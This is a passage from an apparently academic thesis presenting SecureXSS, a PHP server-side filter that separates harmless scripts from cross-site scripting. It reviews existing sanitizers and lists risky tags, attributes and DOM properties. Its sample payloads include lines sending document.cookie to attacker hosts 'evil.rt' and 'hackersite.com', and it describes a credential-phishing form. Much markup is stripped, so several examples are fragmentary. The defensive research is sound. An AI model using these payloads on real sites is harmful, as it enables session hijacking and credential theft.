holding the attribute being checked and its contents will be removed entirely. This onInvalid

action is reserved for those attributes, which when removed, make the presence of the tag

meaningless. An example usage of this setting is displayed below.

Welcome, my name is var cke = document.cookie; var url= ‘http://evil.rt/cookie.cgi’+cke; document.location = url; and I’m 25 years old!

Above shown is the message posted by user. The result after failing to validate this code

is shown below.

Welcome, my name is and I’m 25 years old!

If an attribute with an onInvalid action set to filterTag fails validation, the start and end

tag of the node will be removed while the contents are promoted. This is exactly what happens in

the filter processing action. The process can be seen below.

Click on this!

Above shown is the message posted by user. The result after passing this message to

AntiSamy will be:

Click on this!

The default onInvalid action is removeAttribute. When this onInvalid action is set (or if

none is set) on an attribute that fails validation, the attribute itself is removed from the tag, but

the tag and its contents will remain. The process is shown below.

24

Above shown is the message posted by user. The result after passing this message to

AntiSamy will be:

The knowledge base for the filter’s engine is an XML file called antisamy.xml. The same

policy file can be used across multiple implementations (.Net, J2EE, etc.). The default policy file

was tailored to W3C’s HTML 4.0 and CSS 2.0 specifications. Thus any official attributes which

is dictated by the specifications can be used. If a user agent supports an attribute not specified, it

can be added to the policy file, though some effort has already been put in integrating those non-

standard attributes which are being used and honored in the wild.

To summarize, OWASP AntiSamy is an API implemented in Java and .Net to ensure

user-supplied HTML/CSS is in compliance within an application rules. It has very good XSS

cleaning abilities, so long as it removes things it doesn’t recognize. Architecturally speaking,

OWASP AntiSamy is highly dependent on policy files, which is a highly extended form of XML

Schema with information on what attributes and elements to allow. As such, the actual code for

filtering is relatively light-weight. Unfortunately, while XML Schema files can get a high level

of control on the validation, the regular expression heavy approach begins showing signs of

stress when data-types are complex (e.g. URIs).

3.2 The strip_tags()

The PHP function strip_tags() [STT] is the classic solution for attempting to clean up

HTML from unwanted tags (like or ). It is the worst solution of all to avoid

XSS because, the fact that it doesn't validate attributes at all (means that anyone can insert

malicious scripts in attributes like onmouseover='xss();' and exploit the application). While this

can be bandaided with a series of regular expressions that strip out on[event], striptags() is

fundamentally flawed and should not be used. Example of using strip_tags is illustrated below:

25

echo strip_tags($text, '

'); // Allow

and

?>

In the above example, strip_tags() strips all the tags except

and tags. By using

this malicious tags like , and can be stripped out, but we cannot validate

the values of attributes. To validate attributes of tags, we can write extra code at server side, but

the solution cannot be efficient and effective.

3.3 PHP Input Filter

PHP Input Filter [PIF] is the upgraded version of striptags(), with the ability to inspect

attributes. PHP Input Filter implements an HTML parser, and performs very basic checks on

whether or not tags and attributes have been defined in the whitelist (left upto user what he will

permit). Since it completely fails in checking the well-formedness, it is trivially easy to trick the

filter into leaving unclosed tags. Any user that allows the style attribute will be in great trouble as

we can't simply just let CSS through and expect layout not to be badly mutilated.

3.4 HTML_Safe/SafeHTML

HTML_Safe/SafeHTML [HTS] mechanism of action involves parsing HTML with a

SAX parser and performing validation and filtering as the handlers are called. strip_tags can only

strip tags. HTML_safe strips down all active content, including tags, attributes and values of

atrributes. This parser strips down all potentially dangerous content within HTML:

opening tag without its closing tag

closing tag without its opening tag

any of these tags: "base", "basefont", "head", "html", "body", "applet", "object",

"iframe", "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound", "link", "meta",

"style", "title", "blink", "xml" etc.

any of these attributes: on*, data*, dynsrc

javascript:/vbscript:/about: etc. protocols

26

expression/behavior etc. in styles

any other active content

It also tries to convert code to XHTML valid, but htmltidy is far better solution for this

task. HTML_Safe does a lot of things right, like blacklisting the list of dangerous attributes, But

by blacklisting tags (like style, applet, etc) for the reason that it have some dangerous attributes

will result in loss of functionality. Added to this it blocks all the occurrences of XSS by stripping

it off.

3.5 Kses

Kses [KSS] is an HTML/XHTML filter written in PHP. It removes all unwanted HTML

elements and attributes, and it also does several checks on attribute values (to avoid buffer

overflow attacks). Kses can be used to avoid XSS, as it will only allow the HTML elements and

attributes that it was explicitly told to allow. It will remove additional "" characters that

people may try to sneak in somewhere. The set of API’s that Kses allow its user to use are shown

below with explaination.

Table 3.1: Kses API’s

API Functionality

Parse($string = "") The basic function of kses. Give it a $string, and it will strip out

the unwanted HTML and attributes.

AddProtocols() Add a protocol or list of protocols to the kses object to be

considered valid during a Parse(). The parameter can be a string

containing a single protocol, or an array of strings, each

containing a single protocol.

Protocols() Deprecated. Use AddProtocols()

AddProtocol($protocol = "") Adds a single protocol to the kses object that will be considered

valid during a Parse().

27

SetProtocols() This is a straight setting/overwrite of existing protocols in the

kses object. All existing protocols are removed, and the

parameter is used to determine what protocol(s) the kses object

will consider valid. The parameter can be a string containing a

single protocol, or an array of strings, each constaining a single

protocol.

DumpProtocols() This returns an indexed array of the valid protocols contained in

the kses object.

DumpElements() This returns an associative array of the valid (X)HTML elements

in the kses object along with attributes for each element, and

tests that will be performed on each attribute.

AddHTML($tag = "", $attribs

= array())

This allows the end user to add a single (X)HTML element to

the kses object along with the (if any) attributes that the specific

(X)HTML element is allowed to have.

RemoveProtocol($protocol =

"")

This allows for the removal of a single protocol from the list of

valid protocols in the kses object.

RemoveProtocols() This allows for the single or batch removal of protocols from the

kses object. The parameter is either a string containing a

protocol to be removed, or an array of strings that each contain a

protocol.

filterKsesTextHook($string) For the OOP (Object Oriented Programming) version of kses,

this is an additional hook that allows the end user to perform

additional postprocessing of a string that's being run through

Parse().

_hook() Deprecated. Use filterKsesTextHook().

28

Configuring and usage of the Kses API’s are very simple and flexible, like user can set

the protocols that he want to allow or disallow, user can configure the API to add or remove the

element or attribute from the preconfigured Kses. Users are supposed to be very cautious in

using API’s, as different ways of using API’s results in different functionality. But Kses is not a

very good option as it has many loop holes which are exposed publicly by its users [GEL].

3.6 htmLawed

To say about htmLawed in its developers words, the highly-customizable htmLawed

[HTM, HTL] filter can be used to make text with HTML more secure, policy-compliant. It can

auto-correct and beautify HTML markup and restrict HTML elements (tags), attributes, and URL

protocols in the input. It also balances tags and checks for proper nesting of the HTML elements.

Furthermore, it can transform deprecated tags and attributes, check and convert character entities

(e.g., from hexadecimal to decimal type), obfuscate email addresses as an anti-spam measure,

etc. The set of features that htmLawed provides seems to be quite appreciable. But it just strips

of all the occurrences of script. It fails in validating and differentiating the simple script from

XSS.

At the other hand, web researches say [HTP]; htmLawed is modified version of Kses

(with some features added). It just strips of the script tag in order to avoid execution of script and

validation of attribute values is not so good (it allows inclusion of cgi/javascript/html files which

may lead to XSS).

3.7 Safe HTML Checker

Safe HTML Checker [SHC] is of same flavor as others, but which is well written piece of

code (strict in checking and parsing the tags). It is a white listing filter which filters all

occurrences of non found tags in the filter list. It is very strict in filtering all the occurrences of

script and CSS (Cascading Style Sheet). Safe HTML Checker is developed to satisfy the

requirements shown below.

1. Entered markup should be valid to XHTML strict, to stop comments form breaking

validation and keep things nice and tidy.

29

2. No presentational markup! They wanted web administrator to have complete control over

style sheets and comments posted should only be able to use structural HTML elements.

3. Attributes should be restricted to those that add semantic meaning. Javascript event

attributes and CSS related attributes should not be allowed.

4. Web Administrator should retain full control over the tags and attributes allowed in the

comments.

5. Submitted HTML must be kept free from anything that could pose a security risk, such as

javascript: URLs.

Just to satisfy these requirements, developer of Safe HTML Checker was not much

worried in the loss of functionality by his solution.

3.8 HTML Purifier

HTML Purifier [HTP] is a standards-compliant HTML filter library written in PHP.

Developers of HTML Purifier claim that it will remove all scripting code by auditing it

thoroughly, which is the loss of functionality provided. This is not less than all other existing

solutions in stripping off all the occurrences of script.

3.9 Summary

Regarding the available API/tool support, the present situation is not so (at all)

encouraging. Even the combination of all the approaches is not promising for web application

security; hardly any tools support the proper approach. Absence of holistic approach in

identifying the proper XSS attack is genuine matter of concern for web application security.

30

CHAPTER 4

PROBLEM STATEMENT

Simple script inserted in the message is very often misunderstood as XSS attack.

Scripting is a functionality provided for better ever experience. In existing solutions, any script

inserted is always assumed to be malicious and being stripped. For example, alert(“XSS”) is not

malicious because it does not harm the user. In contrast, alert(document.cookie) is malicious

because it is trying to access the browser DOM object (which is supposed to be secure). This

may lead to hijacking of the user session. As per security terms, one that harms a legitimate user

is an attack. Hence we claim that just inserting any script cannot be XSS attack.

Having understood the XSS attacks, another challenge that we identified to safe guard the

users from XSS attacks is whether to go with server side solution or client side solution. Client

side solution can help the users who are security conscious; who are familiar of XSS attacks and

the one who have some technical expertise (to use the solution we provide), such solution may

not help the novice users.

This project aims at developing holistic server side XSS API which differentiates the

XSS attack from simple script and strips it off. Thus novice users can enjoy the safe and better

experience of browsing without any surge of functionality, need of additional software or

configuration at browser side. Developing such API also reduces burden to web administrators to

safe guard their web applications from malignant XSS attacks.

31

CHAPTER 5

DIFFERENTIATING XSS FROM SIMPLE SCRIPTS

An analysis of available and widely used solutions for XSS is discussed in Chapter 3.

The point that existing solutions are missing out and giving scope for the new set of problem (s),

are discussed in Chapter 4. This Chapter will roam around the solution for the problem/challenge

identified.

As it is well known fact that XSS will occur because of some malicious script inserted

by an attacker in the web application, before we find what can be malicious script, we should

find the scope of an attacker to insert malicious script in the web application. Basically while

designing the Markup Languages, none of the tags and/or its attributes is meant for malicious

purpose. They are made for the genuine usage, but the attackers/hackers use these tags and /or its

attributes for their profits (basically for name or fame or robbing). By our observation, we found

a list of tags and/or its attributes which give scope for an attacker to insert malicious script, and

the same is shown in Table 5.1:

Table 5.1: Tags and its attributes which are in favour of attackers

Tag Attribute

form action

body background

applet code

object data

a, area, link href

iframe, frame, img longdesc

img onabort

32

a, area, button, input, label, select, textarea onblur

input, select, textarea onchange

a, abbr, acronym, address, area, tt, i, b, small, big, body, button,

caption, center, em, strong, dfn, code, samp, kbd, var, cite, col,

colgroup, dd, del, dir, div, dl, dt, fieldset, form, h1 - h14, input, ins,

label, legend, li, link, map, menu, noframes, noscript, ol, hr, img,

optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody

td, textarea, tfoot, th, thead, tr, u, ul

onclick, ondblclick,

onkeydown,

onkeypress, onkeyup,

onmousedown,

onmousemove,

onmouseout,

onmouseover,

onmouseup

h15 ondblclick

h15 - h16, onmousedown

h15 - h17, onmousemove

h15 - h18, onmouseout

h15 - h19, onmouseover

h15 - h20, onmouseup

h15 - h21, onkeydown

h15 - h22, onkeypress

h15 - h23, onkeyup

body, frameset onload

a, area, button, input, label, select, textarea onfocus

form onreset

33

input, textarea onselect

form onsubmit

body, frameset onunload

frame, iframe, img, input, script src

a, abbr, acronym, address, applet, area, tt, I, b, small, big,

basefont, bdo, blockquote, body, br, button, caption, center, em, strong,

dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt,

fieldset, font, form, frame, frameset, h1 - h11, hr, iframe, img, input, ins,

label, legend, li, link, map, menu, noframes, noscript, object, ol,

optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody,

td, textarea, tfoot, th, thead, tr, u, ul

style

Having understood that the above tags and/or its attributes give scope for an attacker to

insert some malicious script, it is extremely necessary to know, how they are accessible to an

attacker. The total set of attributes found vulnerable can be categorized into three types:

1. Set of attributes giving scope for content out of the actual page, such as href, src, etc,

through which a page/object with some malicious content can be included in the

existing page.

2. Set of attributes which allows user to write script directly, such as onload, onmouse,

onclick, etc, through which some malicious script can be included.

3. Set of attributes which allows user to do stylings for his content.

These three categories how they are different can be understood better with an example.

The first type is the set of attributes which include external object/content to the current/existing

page. To illustrate how these attributes can act malicious, we’ll take tag of image type.

For the tag of image type, some external image content will be fed using an attribute

34

called “SRC”, which displays the image in the existing page. But an attacker will insert some

malicious script instead of feeding the location of the image location. One such example is

shown below, which will alarm with the session cookie, every time the page is loaded. Just

alarming is exactly not malicious script, but since it is alarming with the user session cookie

which is supposed to be secure, it is considered to be malicious.

The set of attributes that belong to this category are: action, background, classid, code,

data, href, longdesc, src.

This type of attributes should be set to restrictions in allowing the external content based

on the tag and type of attribute. The allowed set of extensions for each of the tag and its

attributes are shown below:

Table 5.2: Extensions allowed

Tag Attribute Allowed Extensions

img, input

(type=image)

src, lowsrc,

dynsrc

.jpg, .jpeg, .png, .xbm, .gif, .bmp

a, area, link href .htm, .html, .asp, .jsp, .php, .aspx, .swf, .rb, .pl, .cgi

frame, iframe src .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp,

.php, .aspx

Any Tag longdesc .txt, .rtf, .doc

embed src .pdf, .doc, .wav

Any Tag background .jpg, .jpeg, .png, .xbm, .gif, .bmp

script src This attribute is not allowed

bgsound src .wav, .mid, .au

35

applet code .class

object classid .class, .py, .rb

object data .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp,

.php, .aspx, .flv, .mov, .wmv, .rm, .ra, .ram

The second type is the set of attributes which allows users to insert some script directly.

Allowing user to insert script directly is similar to leaving the bank open 24 Hrs, which makes

easy for thief to rob the bank. But in the way banks make its security system alert to protect their

customer’s wealth from thief, web administrator should make sure of the security system, to safe

guard the novice users. To understand how these type of attributes how it can be malicious, an

example is illustrated below, which will open a new window every time the page is loaded and

posts the novice user’s session cookie to attacker site through which session hijacking will be

done.

The set of attributes that belong to this category are: onblur, onclick, ondblclick, onfocus,

onmousedown, onmousemove, onmouseout, onmouseover, onmouseup, onkeydown, onkeypress,

onkeyup, onload, onunload, onabort, onblur, onchange, onreset, onselect, onsubmit.

The last and the third kind of attribute set will allow user to set the style for his content.

Examples explained for Type 1 and Type 2 categories of attributes are modified here to illustrate,

how third set of attributes can be used as vulnerable.

The only attribute that belongs to this category is style.

36

To save novice users from XSS, we should contemplate on four more tags apart from all

the attributes listed above, namely , , and tags. The tag

will be used by an attacker to insert some malicious script directly. The tag is generally

used to refer the defined path for the content in the page. This also can be used by an attacker to

edit the path of reference or redirect it to his site. In the way style attribute is used, similarly

tag will be used to insert malicious script. Such an example is shown below:

background-image: url(window.open(

http://hackersite.com/info.pl?captcha=document.cookie

In the above example, instead of giving the back ground image URL, a malicious script

is given, which on execution will open a new window and sends the user’s session cookie to

hacker’s site.

To save users from XSS kind of phishing attack which is explained in Section 2.6.3, we

should ponder upon inner text and action attribute of tag. Illustration of how

tag’s inner text will be used by an attacker is shown below:

User Name:
Password:

In the example shown above it creates the html form that displays two text boxes asking

username and password, on submit which posts the content to hacker’s site. If an attacker posts

this message in the banking website user forum, when an innocent user visits this page, he will

login and which may result in huge loss for the user. Since inner text of tag has such a

serious impact it is always better to strip off any content in tag. Apart from inner text of

tag, ‘action’ attribute also can be used by an attacker to hack the user’s username and

password. An attacker will post a message with tag and some malicious script which will

replace the actual tag with this inserted one. The result of such post is obvious that it

37

causes huge losses to innocent lame users. Hence ‘action’ attribute of tag also should be

removed from user posted message.

Having understood that the above tags and attributes allow an attacker to insert some

scripts to a web application and all the scripts that are inserted cannot be XSS, next step is to find

out what sort of scripts make the XSS possible.

As it is well known that, script that harms is an attack. In case of web applications, harm

that will occur to its users can be session hijacking, denial of service, phishing and altering the

page content. By hacking the user session cookies, attacker can hijack legitimate user session.

Denial of service can be done in many ways, like not allowing the user to visit the page he

wanted to visit by changing the page location or infinitely throwing alerts, etc. Phishing can be

done by creating/editing the forms on the web page.

As the problem is now narrowed down to certain possibilities, now it is not difficult for

someone to find out what sort of script (s) causes all such issues to a novice user. Our work on

finding out the malicious scripts resulted in restricting access to some set of DOM properties.

The Table 5.3 shows some DOM properties, which we should make sure that no attacker will

access it, in order to protect the legitimate user.

Table 5.3: DOM Properties which will cause XSS attacks

DOM Property Reason

Document.cookie This property will be used to steal the innocent user session.

Document.location, Location.href, Location.replace, Location.reload, Window.location, Window.location.reload(), Window.top.location, location.assign, window.self.location, document.reload

These DOM properties will be used to edit the document location and make a denial of service attack.

Window.history, history.forward, This DOM property will be used to access history of the

38

history.go, history.back browser window, keep showing the pages from history and not allowing user to access the page he wants to visit.

Document.write, document.writeln These properties will be used by an attacker to edit the page content.

Document.title This property will be used to change the title of the page

Window.status, window.defaultStatus

These properties will be used to change the status of the page and create panic to legitimate user.

Document.getElementById, document.getElementsByName, document.getElementsByTagName

These properties will be used to set the values of tag attributes in the page

Document.anchors, document.forms, document.frames, document.images, document.links, window.frames

These properties will be used to set the values to the corresponding tags in the page.

To save legitimate users from the hands of an attacker, we should find out all the

occurrences of any of the above shown properties, in the attributes shown in the Table 5.1 and

strip it off. Not only in the attributes shown in Table 5.1, but also in the inner text of tag

and tag.

If we can strip off all the malicious scripts at all the occurrences stated above

successfully, we can save the novice users from malignant XSS.

39

CHAPTER 6

IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS

As explained in Chapter 4, the solution that we come out with should not burden up the

lame user (user without any technology background) with extra configurations or installations at

browser end. At the same time he should enjoy the secure browsing with no surge in

functionality. Having understood all the challenges identified and solution proposed in Chapter

5, our goal is to implement a server side API, which should be fast, should not weigh down the

web server, makes minimal encumber to web developers/administrators.

This part of the thesis revolves around procedure of the solution, implementation details,

working of solution, results and finally comparison of our solution with other existing solutions

(with respect to time, not with respect to functionality)

6.1 Procedure

The abstract view of the solution explained in chapter 5 may not help the reader/user to

understand the solution. For the benefit of reader/user, core of the solution is presented here in

this section.

Algorithm 6.1 (High-level Algorithm explain procedure of SecureXSS)

Input: Input given by user (can be plain text or HTML or script)

Output: XSS free user input (Filtered user message)

1. Generate DOM for all the tags in the user given input.

2. Parse for all occurrences of script attributes (Type 2 kind of attributes explained in

Chapter 5).

3. Normalize value of each attribute, for each occurrence in step 2 and validate it.

4. Restrict the value of attribute for Type 1 kind of attributes as defined in Table 5.2.

40

5. Find all the occurrences of script tag, remove src attribute if set, normalize and

validate the inner text of script tag.

6. Find all the occurrences of style attribute, normalize and validate it.

7. Find all the occurrences of style tag and normalize the inner text and validate it.

8. Find all the occurrences of form tag remove action attribute if set and strip off the

inner text of form tag.

9. Remove the attributes which got failed in validation from step 3 through step 8.

10. Return the XSS free output.

6.2 Implementation Details

Having understood the solution in detail, from the procedure given above, in this section

we will present the implementation details of SecureXSS API. SecureXSS is the server-side XSS

filtering API, developed in PHP5. To generate DOM for the user given input, we are using

Simple HTML DOM Parser [HDP], which is an open source API, written in PHP.

The current version of SecureXSS is the model API developed in PHP5 to make web

developer’s job alleviate, which results in secure browsing for innocent users. This model is

developed to prove the correctness of the solution. Interested web developers can feel free to port

this solution to other server-side technologies (like asp, jsp, etc) that they are interested in.

As it is said above, in our implementation, we used Simple HTML DOM Parser (since

we felt it is working better compared to other DOM parsers) to parse and generate DOM for the

user input or given message. The current implementation of API restricts itself to Simple HTML

DOM Parser. The users who wish to use their own DOM parser or any other available DOM

parser, may have to rewrite the API for their usage. Once the DOM tree is generated for all tags

in the user given input, Step 2 to Step 9 in the above said procedure will be same.

41

6.3 Working of SecureXSS

SecureXSS is the server-side XSS filtering API, which validates and returns the non-

malicious user given input, on passing the malicious user input. The usage of SecureXSS API is

illustrated below in Figure 6.1. When user sends post request to web server, it instantiates the

API and forwards the user input to API. API validates and strips all the malicious content and

returns the non malicious content back to server, on which the user requested operation is

processed by web server.

Figure 6.1: Server-side XSS Filtering API

Steps shown above in Figure 6.1 are explained below:

1. Client sends post request to web server.

2. Web server sends request to SecureXSS API.

42

3. SecureXSS sends back the non-malicious user request.

4. Web server stores the user post in database (or) it processes the request in other case.

Here we will see working of the solution on the sample html shown below.

document.write("

43

6.4 Results

Security mechanisms cannot be comprehensively tested because it’s impossible to prove

a negative. Another way of saying that is, there is no way of knowing if the set of all publicly

known attacks, which can be incorporated into test cases, is equal to the set of all possible

attacks. A subset (200 vectors) of all publicly known XSS attacks gathered from recognized

knowledge bases [RSN] [W3S] have been tested with 100% effectiveness (shown in Appendix

II). Out of 200 vectors we collected, 100 are malicious and other 100 are non malicious (as

explained in Chapter 4).

Running time was also a very important consideration given the importance of

availability and response time for enterprise applications. In order to do the timing tests, we have

collected a set of 350 web pages from popular sites like http://news.yahoo.com/,

http://news.google.com/ and http://msdn.microsoft.com/. The results from our timing tests

(overhead) are shown in Table 6.1.

Table 6.1: SecureXSS timing test (overhead) results

Size of HTML (KB) Average Execution Time (Sec)

10-30 0.095048352

31-60 0.182305614

61-90 0.234215016

91-120 0.269700872

The results shown above are shown as graph in Figure 6.2, in which Size of HTML is

taken on X-axis and Execution time on Y-axis. Results shown above are taken on Intel Core 2

Duo 3.0 GHz system with 2GB RAM, running Windows XP Professional SP2, using XAMPP

web server.

44

Figure 6.2: SecureXSS overhead on the server

The results are also compared with another popular XSS API called HTML Purifier,

which is shown in Appendix III. As HTML Purifier is compared with all other solutions in

[HTP], we can say SecureXSS works very good compared all the existing server side XSS

filtering API’s.

Size of HTML – X-axis Execution Time – Y-axis

45

CHAPTER 7

CONCLUSIONS

Internet has revolutionized different aspects of human life, the way people communicate,

do business, etc. But the trust on these applications and the users experience is not fully

satisfactory due to plethora of security breaches which happen frequently in many critical

applications like banking, which leads to privacy threat of the legitimate customers’ details. So

this project will help in increasing the security of the web applications, hence enhancing the trust

on these applications by the end customers and providing a better experience online.

This project addresses the most important issue faced by current day web users, which is

Cross-site Scripting (XSS) attack. The important goal of this project was to build a server side

XSS filtering API which differentiates the simple script from malevolent XSS, besides which

execution time is also considered to be one of the factors. In the way, we worked on

differentiating simple XSS from XSS (as no existing server side XSS API’s are differentiating

simple script from XSS). We proposed an approach for differentiating simple script from XSS.

We also developed an open source server side XSS filtering model API called SecureXSS

(pronounce as Secure Excess), which differentiates simple script from malignant XSS.

Scope for Future Work

The developed model API works very fine in stripping out the genuine XSS (including

XSS worms and virus), but however it is restricted to PHP, as it is developed in PHP. The same

logic/work can be extended to all the other server side scripting languages (like asp, jsp, etc), so

that all classes of web developers can use the solution.

46

REFERENCES

[OWA] OWASP Top 10, The Ten Most Critical Web Application Security vulnerabilities, http://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf, Last Accessed: July 7, 2009.

[CER] Cert advisory ca-2000-02 malicious html tags embedded in client web requests., February 2000.

[XSS] Cross-site Scripting (XSS), www.owasp.org/index.php/Cross_site_scripting, Last Accessed: July 7, 2009.

[USC] US-CERT. eBay contains a cross-site scripting vulnerability. http://www.kb.cert.org/vuls/id/808921, 2006.

[KLE] Amit Klein. DOM Based Cross Site Scripting or XSS of the Third Kind. http://www.webappsec.org/projects/articles/071105.shtml, 2005.

[PEW] Pew Internet & American Life Project Report: Spam and Phishing. http://www.pewinternet.org, 2005.

[STA] Ed Stansel. Don’t Get Caught by Online Phishers Angling for Account information. Florida Times-Union, 1997.

[OLL] Gunter Ollmann. The Phishing Guide, Understanding & Preventing Phishing Attacks. NGSSoftware Insight Security Research, 2004.

[RRO] J.Martin, Justus Winter. RequestRodeo: Client Side Protection against Session Riding. In OWASPAppSec2006Europe, 2006.

[ROB] Robert Auger. The Cross-Site Request Forgery (CSRF/XSRF) FAQ. http://www.cgisecurity.com/csrf-faq.html. Apr, 2008.

[CSRF] Cross Site Request Forgery, An introduction to a common web application weakness. Jesse Burns 2007.

[JEG] Jeremiah Grossman, Robert “RSnake” Hansen, Petko “pdp” D. Petkov, Anton Rager, Seth Fogie, XSS Attacks Cross-site Scripting Exploits and Defence, Syngress Publishing, Inc., ISBN-13: 978-1-59749-154-9.

[BBC] BBCode, http://en.wikipedia.org/wiki/BBCode, Last Accessed: July 7, 2009.

[WIT] Wikitext, http://en.wikipedia.org/wiki/Wikitext, Last Accessed: July 7, 2009.

[MAD] Markdown, http://daringfireball.net/projects/markdown/, Last Accessed: July 7, 2009.

47

[TEX] Textile, http://textism.com/tools/textile/, Last Accessed: July 7, 2009.

[STT] Strip_tags – Manual, http://php.net/manual/en/function.strip-tags.php, Last Accessed: July 8, 2009.

[PIF] PHP Input Filter, www.phpclasses.org/browse/package/2189.html#download, Last Accessed: July 8, 2009.

[HTS] HTML_Safe, http://pear.php.net/package/HTML_Safe/, Last Accessed: July 8, 2009.

[KSS] Kses, http://sourceforge.net/projects/kses/, Last Accessed: July 8, 2009.

[HTL] htmLawed, www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php, Last Accessed: July 8, 2009.

[SHC] Safe HTML Checker, http://simonwillison.net/2003/Feb/23/safeHtmlChecker/, Last Accessed: July 8, 2009.

[HTP] HTML Purifier, http://htmlpurifier.org/, Last Accessed: July 8, 2009.

[ANT] Dabirsiaghi, Arshan, Towards Automated Malicious Code Detection and Removal on the Web, Open Web Application Security Project, Aspect Security, Inc., 2007.

[GEL] Security issues in Kses - Geeklog, http://www.geeklog.net/article.php/kses, Last Accessed: July 16, 2009.

[HTM] htmLawed, http://drupal.org/project/htmLawed, Last Accessed:July 16, 2009.

[HDP] PHP Simple HTML DOM Parser, http://simplehtmldom.sourceforge.net/, Last Accessed: July 20, 2009.

[RSN] XSS (Cross-site Scripting) Cheat Sheet, http://ha.ckers.org/xss.html, Last Accessed: July 24, 2009.

[W3S] W3Schools, http://www.w3schools.com, Last Accessed: July 24, 2009.

48

APPENDIX I

OWASP THE TEN MOST CRITICAL WEB APPLICATION SECURITY VULNERABILITIES

The Open Web Application Security Project (OWASP) (www.owasp.org) is a worldwide

free and open community focused on improving the security of application software. OWASP’s

mission is to make application security visible, so that people and organizations can make

informed decisions about true application security risks.

The primary aim of the OWASP Top 10 is to educate developers, designers, architects

and organizations about the consequences of the most common web application security

vulnerabilities. This is based on the MITRE Vulnerability trends (explained in

http://cwe.mitre.org/documents/vuln-trends/index.html), from which the top ten vulnerabilities

are distilled. The following are the ranks of the vulnerabilities:

Figure 1: MITRE data on Top 10 web application vulnerabilities for 2006

[OWA] discusses each of the vulnerability in detail along with the protection measures

to be taken to protect the application from these vulnerabilities. However, it is considered that

49

the most common vulnerabilities like Unvalidated input, Buffer overflows, integer overflows and

format string issues, Denial of service and Insecure configuration management are taken care of

in the web applications. The following table provides a brief discussion about the top 10 web

application vulnerabilities listed in the OWASP Top 10 2007 [OWA].

Table 1: OWASP Top 10 Web Application Vulnerabilities

Vulnerability Description

A1 – Cross Site Scripting (XSS)

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

A2 – Injection Flaws

Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data.

A3 – Malicious File Execution

Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile

server side api to secure xss - isea.nitk.ac.inisea.nitk.ac.in/publications/securexss.pdf · side...

Documents